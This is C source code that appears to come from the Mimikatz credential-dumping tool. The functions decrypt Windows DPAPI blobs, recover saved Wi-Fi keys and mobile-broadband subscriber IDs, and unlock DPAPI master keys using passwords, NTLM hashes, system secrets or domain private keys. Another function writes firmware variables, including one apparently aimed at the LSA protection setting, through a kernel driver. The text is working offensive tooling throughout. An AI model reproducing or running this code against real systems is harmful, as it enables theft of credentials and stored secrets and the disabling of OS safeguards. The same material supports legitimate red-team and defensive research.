NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[])
{
PBYTE pFile, hex, dataOut;
DWORD dwData, lenHex, lenDataOut;
LPWSTR dataU, dataF;
LPCWSTR infile;
PKULL_M_DPAPI_BLOB blob;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &pFile, &dwData))
{
if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
{
if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF))
{
kprintf(L"Profile \'%s\'\n\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF))
{
kprintf(L" * AccessString : %s\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF))
{
if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
{
if(blob = kull_m_dpapi_blob_create(hex))
{
kprintf(L"\n");
kull_m_dpapi_blob_descr(0, blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
{
kprintf(L" * SubscriberID : ");
kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
kprintf(L"\n");
kprintf(L"%.*s", lenDataOut / sizeof(wchar_t), dataOut);
LocalFree(dataOut);
}
kull_m_dpapi_blob_delete(blob);
}
LocalFree(hex);
}
LocalFree(dataF);
}
LocalFree(dataU);
}
LocalFree(pFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_protect(int argc, wchar_t * argv[])
{
DATA_BLOB dataIn, dataOut, dataEntropy = {0, NULL};
PKULL_M_DPAPI_BLOB blob;
PCWSTR description = NULL, szEntropy, outfile;
CRYPTPROTECT_PROMPTSTRUCT promptStructure = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ}, *pPrompt;
DWORD flags = 0, outputMode = 1;
kull_m_string_args_byName(argc, argv, L"data", (PCWSTR *) &dataIn.pbData, MIMIKATZ);
kull_m_string_args_byName(argc, argv, L"description", &description, NULL);
if(kull_m_string_args_byName(argc, argv, L"entropy", &szEntropy, NULL))
kull_m_string_stringToHexBuffer(szEntropy, &dataEntropy.pbData, &dataEntropy.cbData);
if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL))
flags |= CRYPTPROTECT_LOCAL_MACHINE;
pPrompt = kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL) ? &promptStructure : NULL;
if(kull_m_string_args_byName(argc, argv, L"c", NULL, NULL))
outputMode = 2;
kprintf(L"\ndata : %s\n", dataIn.pbData);
kprintf(L"description : %s\n", description ? description : L"");
kprintf(L"flags : "); kull_m_dpapi_displayProtectionFlags(flags); kprintf(L"\n");
kprintf(L"prompt flags: "); if(pPrompt) kull_m_dpapi_displayPromptFlags(pPrompt->dwPromptFlags); kprintf(L"\n");
kprintf(L"entropy : "); kull_m_string_wprintf_hex(dataEntropy.pbData, dataEntropy.cbData, 0); kprintf(L"\n\n");
dataIn.cbData = (DWORD) ((wcslen((PCWSTR) dataIn.pbData) + 1) * sizeof(wchar_t));
if(CryptProtectData(&dataIn, description, &dataEntropy, NULL, pPrompt, flags, &dataOut))
{
if(blob = kull_m_dpapi_blob_create(dataOut.pbData))
{
kull_m_dpapi_blob_descr(blob);
kull_m_dpapi_blob_delete(blob);
}
kprintf(L"\n");
if(kull_m_string_args_byName(argc, argv, L"out", &outfile, NULL))
{
if(kull_m_file_writeData(outfile, dataOut.pbData, dataOut.cbData))
kprintf(L"Write to file \'%s\' is OK\n", outfile);
}
else
{
kprintf(L"Blob:\n");
kull_m_string_wprintf_hex(dataOut.pbData, dataOut.cbData, outputMode | (16 << 16));
kprintf(L"\n");
}
LocalFree(dataOut.pbData);
}
else PRINT_ERROR_AUTO(L"CryptProtectData");
if(dataEntropy.pbData)
LocalFree(dataEntropy.pbData);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[])
{
NTSTATUS status;
LPCWSTR szName, szGuid, szAttributes, szData;
UNICODE_STRING uName, uGuid;
GUID guid;
LPBYTE hex = NULL;
DWORD size, attributes, nameLen, structSize;
PMIMIDRV_VARIABLE_NAME_AND_VALUE vnv;
kull_m_string_args_byName(argc, argv, L"name", &szName, L"Kernel_Lsa_Ppl_Config");
kull_m_string_args_byName(argc, argv, L"guid", &szGuid, L"{77fa9abd-0359-4d32-bd60-28f4e78f784b}");
kull_m_string_args_byName(argc, argv, L"attributes", &szAttributes, L"1");
kull_m_string_args_byName(argc, argv, L"data", &szData, L"00000000");
RtlInitUnicodeString(&uName, szName);
RtlInitUnicodeString(&uGuid, szGuid);
attributes = wcstoul(szAttributes, NULL, 0);
status = RtlGUIDFromString(&uGuid, &guid);
if(NT_SUCCESS(status))
{
kprintf(L"Name : %wZ\nVendor GUID: ", &uName);
kuhl_m_sysenv_display_vendorGuid(&guid);
kprintf(L"\nAttributes : %08x (", attributes);
kuhl_m_sysenv_display_attributes(attributes);
kprintf(L")\n");
if(kull_m_string_stringToHexBuffer(szData, &hex, &size))
{
kprintf(L"Length : %u\nData : ", size);
kull_m_string_wprintf_hex(hex, size, 1);
kprintf(L"\n\n");
nameLen = ((DWORD) wcslen(szName) + 1) * sizeof(wchar_t);
structSize = FIELD_OFFSET(MIMIDRV_VARIABLE_NAME_AND_VALUE, Name) + nameLen + size;
if(vnv = (PMIMIDRV_VARIABLE_NAME_AND_VALUE) LocalAlloc(LPTR, structSize))
{
vnv->Attributes = attributes;
RtlCopyMemory(&vnv->VendorGuid, &guid, sizeof(GUID));
vnv->ValueLength = size;
vnv->ValueOffset = FIELD_OFFSET(MIMIDRV_VARIABLE_NAME_AND_VALUE, Name) + nameLen;
RtlCopyMemory(vnv->Name, szName, nameLen);
RtlCopyMemory((PBYTE) vnv + vnv->ValueOffset, hex, size);
if(kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_SYSENVSET, vnv, structSize))
kprintf(L"> OK!\n");
LocalFree(vnv);
}
LocalFree(hex);
}
}
else PRINT_ERROR(L"RtlGUIDFromString: 0x%08x\n", status);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_sysenv_set(int argc, wchar_t * argv[])
{
NTSTATUS status;
LPCWSTR szName, szGuid, szAttributes, szData;
UNICODE_STRING uName, uGuid;
GUID guid;
LPBYTE hex;
DWORD size, attributes;
kull_m_string_args_byName(argc, argv, L"name", &szName, MIMIKATZ);
kull_m_string_args_byName(argc, argv, L"guid", &szGuid, L"{b16b00b5-cafe-babe-0ee0-dabadabad000}");
kull_m_string_args_byName(argc, argv, L"attributes", &szAttributes, L"1");
kull_m_string_args_byName(argc, argv, L"data", &szData, L"410020004c00610020005600690065002c002000410020004c00270041006d006f00750072000000");
RtlInitUnicodeString(&uName, szName);
RtlInitUnicodeString(&uGuid, szGuid);
attributes = wcstoul(szAttributes, NULL, 0);
status = RtlGUIDFromString(&uGuid, &guid);
if(NT_SUCCESS(status))
{
kprintf(L"Name : %wZ\nVendor GUID: ", &uName);
kuhl_m_sysenv_display_vendorGuid(&guid);
kprintf(L"\nAttributes : %08x (", attributes);
kuhl_m_sysenv_display_attributes(attributes);
kprintf(L")\n");
if(kull_m_string_stringToHexBuffer(szData, &hex, &size))
{
kprintf(L"Length : %u\nData : ", size);
kull_m_string_wprintf_hex(hex, size, 1);
kprintf(L"\n\n");
status = NtSetSystemEnvironmentValueEx(&uName, &guid, hex, size, attributes);
if(NT_SUCCESS(status))
kprintf(L"> OK!\n");
else PRINT_ERROR(L"NtSetSystemEnvironmentValueEx(data): 0x%08x\n", status);
LocalFree(hex);
}
}
else PRINT_ERROR(L"RtlGUIDFromString: 0x%08x\n", status);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[])
{
PKULL_M_DPAPI_MASTERKEYS masterkeys;
PBYTE buffer;
PPVK_FILE_HDR pvkBuffer;
DWORD szBuffer, szPvkBuffer;
LPCWSTR szIn = NULL, szSid = NULL, szPassword = NULL, szHash = NULL, szSystem = NULL, szDomainpvk = NULL;
BOOL isProtected = kull_m_string_args_byName(argc, argv, L"protected", NULL, NULL);
PWSTR convertedSid = NULL;
PSID pSid;
PBYTE pHash = NULL, pSystem = NULL;
DWORD cbHash = 0, cbSystem = 0;
PVOID output;
DWORD cbOutput;
if(kull_m_string_args_byName(argc, argv, L"in", &szIn, NULL))
{
kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL);
kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL);
kull_m_string_args_byName(argc, argv, L"hash", &szHash, NULL);
kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL);
kull_m_string_args_byName(argc, argv, L"domainpvk", &szDomainpvk, NULL);
if(kull_m_file_readData(szIn, &buffer, &szBuffer))
{
if(masterkeys = kull_m_dpapi_masterkeys_create(buffer))
{
//kull_m_dpapi_masterkeys_descr(masterkeys);
if(szSid)
{
if(ConvertStringSidToSid(szSid, &pSid))
{
ConvertSidToStringSid(pSid, &convertedSid);
LocalFree(pSid);
}
else PRINT_ERROR_AUTO(L"ConvertStringSidToSid");
}
if(szHash)
kull_m_string_stringToHexBuffer(szHash, &pHash, &cbHash);
if(szSystem)
kull_m_string_stringToHexBuffer(szSystem, &pSystem, &cbSystem);
if(convertedSid)
{
if(masterkeys->MasterKey && masterkeys->dwMasterKeyLen)
{
if(szPassword)
{
kprintf(L"\n[masterkey] with password: %s (%s user)\n", szPassword, isProtected ? L"protected" : L"normal");
if(kull_m_dpapi_unprotect_masterkey_with_password(masterkeys->dwFlags, masterkeys->MasterKey, szPassword, convertedSid, isProtected, &output, &cbOutput))
kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_password\n");
}
if(pHash)
{
kprintf(L"\n[masterkey] with hash: "); kull_m_string_wprintf_hex(pHash, cbHash, 0);
if(cbHash == LM_NTLM_HASH_LENGTH)
kprintf(L" (ntlm type)\n");
else if(cbHash == SHA_DIGEST_LENGTH)
kprintf(L" (sha1 type)\n");
else
kprintf(L" (?)\n");
if(kull_m_dpapi_unprotect_masterkey_with_userHash(masterkeys->MasterKey, pHash, cbHash, convertedSid, &output, &cbOutput))
kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_userHash\n");
}
}
if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen)
{
if(!(masterkeys->dwFlags & 1) || (pSystem && cbSystem))
{
kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without");
if(pSystem)
kull_m_string_wprintf_hex(pSystem, cbSystem, 0);
kprintf(L"\n");
if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput))
kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n");
}
}
LocalFree(convertedSid);
}
if(pHash)
LocalFree(pHash);
if(pSystem)
LocalFree(pSystem);
if(szDomainpvk && masterkeys->DomainKey && masterkeys->dwDomainKeyLen)
{
kprintf(L"\n[domainkey] with RSA private key\n");
if(kull_m_file_readData(szDomainpvk, (PBYTE *) &pvkBuffer, &szPvkBuffer))
{
if(kull_m_dpapi_unprotect_domainkey_with_key(masterkeys->DomainKey, (PBYTE) pvkBuffer + sizeof(PVK_FILE_HDR), pvkBuffer->cbPvk, &output, &cbOutput, &pSid))
kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, pSid);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_domainkey_with_key\n");
LocalFree(pvkBuffer);
}
}
kull_m_dpapi_masterkeys_delete(masterkeys);
}
LocalFree(buffer);
}
}
else PRINT_ERROR(L"Input masterkeys file needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_unprotect(int argc, wchar_t * argv[])
{
DATA_BLOB dataIn, dataOut, dataEntropy = {0, NULL};
PKULL_M_DPAPI_BLOB blob;
PCWSTR szEntropy, outfile, infile, szMasterkey, szPassword = NULL;
PWSTR description = NULL;
CRYPTPROTECT_PROMPTSTRUCT promptStructure = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ}, *pPrompt;
DWORD flags = 0;
UNICODE_STRING uString;
BOOL statusDecrypt = FALSE;
PBYTE masterkey = NULL;
DWORD masterkeyLen = 0;
if(kull_m_string_args_byName(argc, argv, L"entropy", &szEntropy, NULL))
kull_m_string_stringToHexBuffer(szEntropy, &dataEntropy.pbData, &dataEntropy.cbData);
if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL))
flags |= CRYPTPROTECT_LOCAL_MACHINE;
pPrompt = kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL) ? &promptStructure : NULL;
if(kull_m_string_args_byName(argc, argv, L"masterkey", &szMasterkey, NULL))
kull_m_string_stringToHexBuffer(szMasterkey, &masterkey, &masterkeyLen);
kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL);
kprintf(L"\nflags : "); kull_m_dpapi_displayProtectionFlags(flags); kprintf(L"\n");
kprintf(L"prompt flags: "); if(pPrompt) kull_m_dpapi_displayPromptFlags(pPrompt->dwPromptFlags); kprintf(L"\n");
kprintf(L"entropy : "); kull_m_string_wprintf_hex(dataEntropy.pbData, dataEntropy.cbData, 0); kprintf(L"\n");
kprintf(L"masterkey : "); kull_m_string_wprintf_hex(masterkey, masterkeyLen, 0); kprintf(L"\n");
kprintf(L"password : %s\n\n", szPassword ? szPassword : L"");
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &dataIn.pbData, &dataIn.cbData))
{
if(blob = kull_m_dpapi_blob_create(dataIn.pbData))
{
kull_m_dpapi_blob_descr(blob);
if(masterkey && masterkeyLen)
statusDecrypt = kull_m_dpapi_unprotect_blob(blob, masterkey, masterkeyLen, dataEntropy.pbData, dataEntropy.cbData, szPassword, (LPVOID *) &dataOut.pbData, &dataOut.cbData);
else
statusDecrypt = CryptUnprotectData(&dataIn, &description, &dataEntropy, NULL, pPrompt, 0, &dataOut);
if(statusDecrypt)
{
if(description)
{
kprintf(L"description : %s\n", description);
LocalFree(description);
}
if(kull_m_string_args_byName(argc, argv, L"out", &outfile, NULL))
{
if(kull_m_file_writeData(outfile, dataOut.pbData, dataOut.cbData))
kprintf(L"Write to file \'%s\' is OK\n", outfile);
}
else
{
uString.Length = uString.MaximumLength = (USHORT) dataOut.cbData;
uString.Buffer = (PWSTR) dataOut.pbData;
kprintf(L"data - ");
if((uString.Length <= USHRT_MAX) && (kull_m_string_suspectUnicodeString(&uString)))
kprintf(L"text : %s", dataOut.pbData);
else
{
kprintf(L"hex : ");
kull_m_string_wprintf_hex(dataOut.pbData, dataOut.cbData, 1 | (16 << 16));
}
kprintf(L"\n");
}
LocalFree(dataOut.pbData);
}
else if(!masterkey) PRINT_ERROR_AUTO(L"CryptUnprotectData");
kull_m_dpapi_blob_delete(blob);
}
LocalFree(dataIn.pbData);
}
}
if(dataEntropy.pbData)
LocalFree(dataEntropy.pbData);
if(masterkey)
LocalFree(masterkey);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[])
{
PBYTE pFile, hex, dataOut;
DWORD dwData, lenHex, lenDataOut;
LPWSTR dataU, dataSSID, dataF, dataAuth;
LPCWSTR infile;
PKULL_M_DPAPI_BLOB blob;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &pFile, &dwData))
{
if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
{
if(kull_m_string_quickxml_simplefind(dataU, L"name", &dataF))
{
kprintf(L"Profile \'%s\'\n\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"SSID", &dataSSID))
{
kprintf(L" * SSID ");
if(kull_m_string_quickxml_simplefind(dataSSID, L"name", &dataF))
{
kprintf(L"name : %s\n", dataF);
LocalFree(dataF);
}
else if(kull_m_string_quickxml_simplefind(dataSSID, L"hex", &dataF))
{
kprintf(L"hex : %s\n", dataF);
LocalFree(dataF);
}
else kprintf(L"?\n");
LocalFree(dataSSID);
}
if(kull_m_string_quickxml_simplefind(dataU, L"authentication", &dataAuth))
{
kprintf(L" * Authentication: %s\n", dataAuth);
if(kull_m_string_quickxml_simplefind(dataU, L"encryption", &dataF))
{
kprintf(L" * Encryption : %s\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"keyMaterial", &dataF))
{
if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
{
if(blob = kull_m_dpapi_blob_create(hex))
{
kprintf(L"\n");
kull_m_dpapi_blob_descr(0, blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
{
kprintf(L" * Key Material : ");
if(_wcsicmp(dataAuth, L"WEP") == 0)
{
kprintf(L"(hex) ");
kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
}
else
kprintf(L"%.*S", lenDataOut, dataOut);
kprintf(L"\n");
LocalFree(dataOut);
}
kull_m_dpapi_blob_delete(blob);
}
LocalFree(hex);
}
LocalFree(dataF);
}
LocalFree(dataAuth);
}
LocalFree(dataU);
}
LocalFree(pFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n");
return STATUS_SUCCESS;
}
